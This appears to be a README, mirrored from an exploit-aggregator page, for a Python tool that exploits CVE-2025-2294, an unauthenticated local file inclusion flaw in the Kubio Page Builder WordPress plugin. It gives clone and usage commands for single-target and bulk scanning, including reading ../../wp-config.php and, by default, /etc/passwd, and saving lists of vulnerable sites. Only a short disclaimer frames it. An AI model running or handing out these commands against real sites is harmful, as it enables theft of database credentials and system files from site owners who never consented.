Share
## https://sploitus.com/exploit?id=EAE732F4-C0A3-5775-B9B6-9B2204068CF7
# Kubio Page Builder LFI Exploit (CVE-2025-2294)

![Python](https://img.shields.io/badge/python-3.6%2B-blue)
![License](https://img.shields.io/badge/license-MIT-green)
![Vulnerability](https://img.shields.io/badge/CVE-2025--2294-critical)

Local File Inclusion (LFI) exploit for Kubio Page Builder WordPress plugin (versions โ‰ค 2.5.1).

## ๐Ÿ“Œ Description

This tool exploits an unauthenticated LFI vulnerability in Kubio Page Builder plugin (CVE-2025-2294), allowing attackers to read sensitive files on vulnerable WordPress installations.

## ๐Ÿš€ Features

- Single target mode (`-u`)
- Bulk scanning from file (`-l`)
- Version detection
- Output results to file (`-o`)
- Automatic vulnerable version check
- Custom file path support

## ๐Ÿ“ฆ Installation

```bash
git clone https://github.com/mrrivaldo/CVE-2025-2294.git
```

## ๐Ÿ›  Usage

### Basic Single Target
```bash
python3 cve-2025-2294.py -u https://vulnerable-site.com
```

### Custom File Path
```bash
python3 cve-2025-2294.py -u https://vulnerable-site.com -f ../../wp-config.php
```

### Bulk Scan Mode
```bash
python3 cve-2025-2294.py -l targets.txt -o results.txt
```

### Help Menu
```bash
python3 cve-2025-2294.py --help
```

## โš™ Options
| Option | Description |
|--------|-------------|
| `-u`, `--url` | Single target URL |
| `-l`, `--list` | File containing list of targets |
| `-f`, `--file` | File to read (default: `/etc/passwd`) |
| `-o`, `--output` | Save vulnerable targets to file |

## ๐Ÿ“ Example File Structure
`targets.txt`:
```
https://wordpress-site1.com
http://wordpress-site2.com
https://another-vulnerable-site.com
```

## โš  Legal Disclaimer
This tool is for **educational purposes only**. The developer is not responsible for any misuse. Always obtain proper authorization before testing any systems.